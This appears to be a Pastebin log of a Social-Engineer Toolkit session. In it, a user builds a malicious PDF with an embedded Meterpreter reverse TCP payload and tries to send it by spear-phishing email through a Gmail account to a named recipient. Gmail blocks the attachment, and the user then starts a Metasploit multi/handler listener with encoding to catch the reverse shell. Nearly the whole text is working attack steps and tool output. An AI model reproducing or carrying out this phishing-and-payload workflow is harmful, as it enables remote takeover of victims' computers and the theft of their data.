Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [---] The Social-Engineer Toolkit (SET) [---]
- [---] Written by David Kennedy (ReL1K) [---]
- [---] Version: 1.0 [---]
- [---] Codename: 'Devolution' [---]
- [---] Report bugs to: davek@social-engineer.org [---]
- [---] Follow Me On Twitter: dave_rel1k [---]
- [---] Java Applet Written by: Thomas Werth [---]
- [---] Homepage: http://www.secmaniac.com [---]
- [---] Framework: http://www.social-engineer.org [---]
- [---] Over 1.4 million downloads and counting. [---]
- Welcome to the Social-Engineer Toolkit (SET). Your one
- stop shop for all of your social-engineering needs..
- DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com
- Select from the menu:
- 1. Spear-Phishing Attack Vectors
- 2. Website Attack Vectors
- 3. Infectious Media Generator
- 4. Create a Payload and Listener
- 5. Mass Mailer Attack
- 6. Teensy USB HID Attack Vector
- 7. SMS Spoofing Attack Vector
- 8 Update the Metasploit Framework
- 9. Update the Social-Engineer Toolkit
- 10. Help, Credits, and About
- 11. Exit the Social-Engineer Toolkit
- Enter your choice: 1
- Welcome to the SET E-Mail attack method. This module allows you
- to specially craft email messages and send them to a large (or small)
- number of people with attached fileformat malicious payloads. If you
- want to spoof your email address, be sure "Sendmail" is installed (it
- is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
- to SENDMAIL=ON.
- There are two options, one is getting your feet wet and letting SET do
- everything for you (option 1), the second is to create your own FileFormat
- payload and use it in your own attack. Either way, good luck and enjoy!
- 1. Perform a Mass Email Attack
- 2. Create a FileFormat Payload
- 3. Create a Social-Engineering Template
- 4. Return to Main Menu
- Enter your choice: 1
- Select the file format exploit you want.
- The default is the PDF embedded EXE.
- ********** PAYLOADS **********
- 1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
- 2. Adobe Flash Player 'Button' Remote Code Execution
- 3. Adobe CoolType SING Table 'uniqueName' Overflow
- 4. Adobe Flash Player 'newfunction' Invalid Pointer Use
- 5. Adobe Collab.collectEmailInfo Buffer Overflow
- 6. Adobe Collab.getIcon Buffer Overflow
- 7. Adobe JBIG2Decode Memory Corruption Exploit
- 8. Adobe PDF Embedded EXE Social Engineering
- 9. Adobe util.printf() Buffer Overflow
- 10. Custom EXE to VBA (sent via RAR) (RAR required)
- 11. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
- 12. Adobe PDF Embedded EXE Social Engineering (NOJS)
- Enter the number you want (press enter for default): 8
- You have selected the default payload creation. SET will generate a normal PDF with embedded EXE.
- 1. Use your own PDF for attack
- 2. Use built-in BLANK PDF for attack
- Enter your choice (return for default): 1
- Enter path to your pdf (enter for default):
- [*] Defaulting to BLANK PDF built into SET...
- [*] Unable to find PDF, defaulting to blank PDF.
- 1. Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker.
- 2. Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker.
- 3. Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker.
- 4. Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
- 5. Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
- 6. Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system.
- 7. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
- Enter the payload you want (press enter for default): 2
- Enter the port to connect back on (press enter for default): 4444
- [*] Generating fileformat exploit...
- [*] Payload creation complete.
- [*] All payloads get sent to the src/program_junk/template.pdf directory
- As an added bonus, use the file-format creator in SET to create your attachment.
- Right now the attachment will be imported with filename of 'template.whatever'
- Do you want to rename the file?
- example Enter the new filename: moo.pdf
- 1. Keep the filename, I don't care.
- 2. Rename the file, I want to be cool.
- Enter your choice (enter for default): 2
- Enter the new filename: practica.pdf
- Filename changed, moving on...
- Social Engineer Toolkit Mass E-Mailer
- There are two options on the mass e-mailer, the first would
- be to send an email to one individual person. The second option
- will allow you to import a list and send it to as many people as
- you want within that list.
- What do you want to do:
- 1. E-Mail Attack Single Email Address
- 2. E-Mail Attack Mass Mailer
- 3. Return to main menu.
- Enter your choice: 1
- Do you want to use a predefined template or craft
- a one time email template.
- 1. Pre-Defined Template
- 2. One-Time Use Email Template
- Enter your choice: 2
- Enter the subject of the email: practica
- Do you want to send the message as html or plain?
- 1. HTML
- 2. Plain
- Enter your choice (enter for plain): 1
- Enter the body of the message, hit return for a new line.
- Type your body and enter control+c when finished: practica
- Next line of the body: de
- Next line of the body: SET
- Next line of the body: ^C
- Enter who you want to send email to: dannyLopez68@gmail.com
- What option do you want to use?
- 1. Use a GMAIL Account for your email attack.
- 2. Use your own server or open relay
- Enter your choice: 1
- Enter your GMAIL email address: z3r0f15h@gmail.com
- Enter your password for gmail (it will not be displayed back to you):
- (552, '5.7.0 Our system detected an illegal attachment on your message. Please\n5.7.0 visit http://mail.google.com/support/bin/answer.py?answer=6590 to\n5.7.0 review our attachment guidelines. x36sm18742937anx.34')
- (8, 'EOF occurred in violation of protocol')
- It appears your password was incorrect.
- Printing response: (8, 'EOF occurred in violation of protocol')
- Press enter to continue.
- SET has finished delivering the emails.
- Do you want to setup a listener yes or no: yes
- [-] ***
- [-] * WARNING: No database support: String User Disabled Database Support
- [-] ***
- _ _ _ _
- | | | | (_) |
- _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
- | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
- | | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
- |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
- | |
- |_|
- =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
- + -- --=[ 639 exploits - 319 auxiliary
- + -- --=[ 215 payloads - 27 encoders - 8 nops
- =[ svn r11425 updated today (2010.12.27)
- resource (src/program_junk/meta_config)> use exploit/multi/handler
- resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
- PAYLOAD => windows/meterpreter/reverse_tcp
- resource (src/program_junk/meta_config)> set LHOST 192.168.0.11
- LHOST => 192.168.0.11
- resource (src/program_junk/meta_config)> set LPORT 4444
- LPORT => 4444
- resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
- ENCODING => shikata_ga_nai
- resource (src/program_junk/meta_config)> set ExitOnSession false
- ExitOnSession => false
- resource (src/program_junk/meta_config)> exploit -j
- [*] Exploit running as background job.
- msf exploit(handler) >
- [*] Started reverse handler on 192.168.0.11:4444
- [*] Starting the payload handler...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement